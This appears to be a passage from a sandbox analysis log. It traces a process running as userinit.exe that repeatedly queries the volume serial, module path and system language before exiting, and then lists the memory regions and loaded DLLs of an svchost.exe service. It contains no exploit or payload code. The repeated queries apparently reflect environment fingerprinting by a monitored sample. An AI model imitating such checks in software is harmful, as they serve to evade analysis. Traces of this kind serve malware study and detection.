[0190.678] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.678] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.678] VirtualAlloc (lpAddress=0x2980000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2980000
[0190.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.679] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.679] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.679] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.680] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.680] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.680] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.680] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.681] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.681] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8e5e4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8e5f8, lpMaximumComponentLength=0x8e5f4, lpFileSystemFlags=0x8e5f0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8e5f8*=0x90c08a66, lpMaximumComponentLength=0x8e5f4*=0xff, lpFileSystemFlags=0x8e5f0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0190.681] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8e4e8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0190.681] GetSystemDefaultLangID () returned 0x150409
[0190.681] VerLanguageNameA (in: wLang=0x409, szLang=0x8e59c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0190.682] ExitProcess (uExitCode=0x0)
Thread:
id = 299
os_tid = 0x534
Thread:
id = 300
os_tid = 0x590
Process:
id = "50"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7f1be160"
os_pid = "0x2c8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "3"
os_parent_pid = "0x338"
cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a38a" [0xc000000f], "LOCAL" [0x7]
Region:
id = 6105
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6106
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 6107
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6108
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6109
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6110
start_va = 0xc0000
end_va = 0x13ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 6111
start_va = 0x140000
end_va = 0x141fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 6112
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 6113
start_va = 0x160000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 6114
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 6115
start_va = 0x180000
end_va = 0x19ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 6116
start_va = 0x1a0000
end_va = 0x1bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 6117
start_va = 0x1c0000
end_va = 0x200fff
entry_point = 0x1c0000
region_type = mapped_file
name = "services.exe"
filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")
Region:
id = 6118
start_va = 0x210000
end_va = 0x24ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 6119
start_va = 0x250000
end_va = 0x317fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 6120
start_va = 0x320000
end_va = 0x33ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 6121
start_va = 0x340000
end_va = 0x37ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 6122
start_va = 0x380000
end_va = 0x39ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 6123
start_va = 0x3a0000
end_va = 0x3a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 6124
start_va = 0x3b0000
end_va = 0x3b7fff
entry_point = 0x3b0000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 6125
start_va = 0x3c0000
end_va = 0x4c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 6126
start_va = 0x4d0000
end_va = 0x4d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 6127
start_va = 0x4e0000
end_va = 0x4e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 6128
start_va = 0x4f0000
end_va = 0x4f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 6129
start_va = 0x500000
end_va = 0x500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 6130
start_va = 0x510000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 6131
start_va = 0x610000
end_va = 0xa02fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 6132
start_va = 0xa10000
end_va = 0xa11fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 6133
start_va = 0xa20000
end_va = 0xa20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 6134
start_va = 0xa30000
end_va = 0xa31fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a30000"
filename = ""
Region:
id = 6135
start_va = 0xa40000
end_va = 0xa40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a40000"
filename = ""
Region:
id = 6136
start_va = 0xa50000
end_va = 0xa50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a50000"
filename = ""
Region:
id = 6137
start_va = 0xac0000
end_va = 0xafffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ac0000"
filename = ""
Region:
id = 6138
start_va = 0xb10000
end_va = 0xddefff
entry_point = 0xb10000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6139
start_va = 0xe00000
end_va = 0xe3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 6140
start_va = 0xe70000
end_va = 0xe77fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 6141
start_va = 0xe80000
end_va = 0xf7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e80000"
filename = ""
Region:
id = 6142
start_va = 0xfb0000
end_va = 0xfeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fb0000"
filename = ""
Region:
id = 6143
start_va = 0x1040000
end_va = 0x107ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 6144
start_va = 0x1080000
end_va = 0x10c7fff
entry_point = 0x1080000
region_type = mapped_file
name = "winlogon.exe"
filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")
Region:
id = 6145
start_va = 0x10d0000
end_va = 0x1117fff
entry_point = 0x10d0000
region_type = mapped_file
name = "winlogon.exe"
filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")
Region:
id = 6146
start_va = 0x1130000
end_va = 0x116ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001130000"
filename = ""
Region:
id = 6147
start_va = 0x1180000
end_va = 0x11bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001180000"
filename = ""
Region:
id = 6148
start_va = 0x11c0000
end_va = 0x11fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 6149
start_va = 0x1210000
end_va = 0x124ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001210000"
filename = ""
Region:
id = 6150
start_va = 0x1270000
end_va = 0x12affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 6151
start_va = 0x12b0000
end_va = 0x13affff
entry_point = 0x0
region_type = private
name = "private_0x00000000012b0000"
filename = ""
Region:
id = 6152
start_va = 0x13c0000
end_va = 0x13fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 6153
start_va = 0x1420000
end_va = 0x145ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001420000"
filename = ""
Region:
id = 6154
start_va = 0x1460000
end_va = 0x149ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 6155
start_va = 0x14a0000
end_va = 0x159ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014a0000"
filename = ""
Region:
id = 6156
start_va = 0x1660000
end_va = 0x169ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001660000"
filename = ""
Region:
id = 6157
start_va = 0x16a0000
end_va = 0x189ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 6158
start_va = 0x18b0000
end_va = 0x18effff
entry_point = 0x0
region_type = private
name = "private_0x00000000018b0000"
filename = ""
Region:
id = 6159
start_va = 0x18f0000
end_va = 0x192ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000018f0000"
filename = ""
Region:
id = 6160
start_va = 0x1930000
end_va = 0x196ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001930000"
filename = ""
Region:
id = 6161
start_va = 0x1980000
end_va = 0x19bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001980000"
filename = ""
Region:
id = 6162
start_va = 0x1a50000
end_va = 0x1a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a50000"
filename = ""
Region:
id = 6163
start_va = 0x1a90000
end_va = 0x1e91fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 6164
start_va = 0x1ea0000
end_va = 0x229ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ea0000"
filename = ""
Region:
id = 6165
start_va = 0x2300000
end_va = 0x233ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 6166
start_va = 0x23a0000
end_va = 0x23dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023a0000"
filename = ""
Region:
id = 6167
start_va = 0x23e0000
end_va = 0x245ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 6168
start_va = 0x2470000
end_va = 0x24affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002470000"
filename = ""
Region:
id = 6169
start_va = 0x6ca50000
end_va = 0x6cadbfff
entry_point = 0x6ca50000
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 6170
start_va = 0x6cae0000
end_va = 0x6cbcafff
entry_point = 0x6cae0000
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 6171
start_va = 0x6d500000
end_va = 0x6d514fff
entry_point = 0x6d500000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 6172
start_va = 0x6dfc0000
end_va = 0x6dfd3fff
entry_point = 0x6dfc0000
region_type = mapped_file
name = "wscsvc.dll"
filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")
Region:
id = 6173
start_va = 0x6e210000
end_va = 0x6e212fff
entry_point = 0x6e210000
region_type = mapped_file
name = "winmgmtr.dll"
filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll")
Region:
id = 6174
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 6175
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 6176
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 6177
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 6178
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 6179
start_va = 0x6ec40000
end_va = 0x6ec75fff
entry_point = 0x6ec40000
region_type = mapped_file
name = "audioses.dll"
filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")
Region:
id = 6180
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 6181
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 6182
start_va = 0x73c00000
end_va = 0x73c11fff
entry_point = 0x73c00000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 6183
start_va = 0x73c70000
end_va = 0x73c7cfff
entry_point = 0x73c70000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 6184
start_va = 0x73cc0000
end_va = 0x73cf0fff
entry_point = 0x73cc0000
region_type = mapped_file
name = "dhcpcore6.dll"
filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")
Region:
id = 6185
start_va = 0x73d00000
end_va = 0x73d3ffff
entry_point = 0x73d00000
region_type = mapped_file
name = "dhcpcore.dll"
filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")
Region:
id = 6186
start_va = 0x73d50000
end_va = 0x73d55fff
entry_point = 0x73d50000
region_type = mapped_file
name = "nrpsrv.dll"
filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")
Region:
id = 6187
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 6188
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 6189
start_va = 0x73d90000
end_va = 0x73d97fff
entry_point = 0x73d90000
region_type = mapped_file
name = "lmhsvc.dll"
filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")
Region:
id = 6190
start_va = 0x74280000
end_va = 0x74286fff
entry_point = 0x74280000
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 6191
start_va = 0x74290000
end_va = 0x74384fff
entry_point = 0x74290000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 6192
start_va = 0x74390000
end_va = 0x743c8fff
entry_point = 0x74390000
region_type = mapped_file
name = "mmdevapi.dll"
filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")
Region:
id = 6193
start_va = 0x743d0000
end_va = 0x743f4fff
entry_point = 0x743d0000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 6194
start_va = 0x74400000
end_va = 0x74479fff
entry_point = 0x74400000
region_type = mapped_file
name = "audiosrv.dll"
filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")
Region:
id = 6195
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6196
start_va = 0x744b0000
end_va = 0x745bbfff
entry_point = 0x744b0000
region_type = mapped_file
name = "wevtsvc.dll"
filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")
Region:
id = 6197
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 6198
start_va = 0x745d0000
end_va = 0x74645fff
entry_point = 0x745d0000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 6199
start_va = 0x74650000
end_va = 0x74654fff
entry_point = 0x74650000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 6200
start_va = 0x74700000
end_va = 0x74715fff
entry_point = 0x74700000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 6201
start_va = 0x74720000
end_va = 0x74736fff
entry_point = 0x74720000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 6202
start_va = 0x74810000
end_va = 0x74817fff
entry_point = 0x74810000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 6203
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 6204
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 6205
start_va = 0x74af0000
end_va = 0x74af5fff
entry_point = 0x74af0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 6206
start_va = 0x74b00000
end_va = 0x74b3bfff
entry_point = 0x74b00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 6207
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 6208
start_va = 0x74d00000
end_va = 0x74d41fff
entry_point = 0x74d00000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 6209
start_va = 0x74f80000
end_va = 0x74f87fff
entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 6210
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6211
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
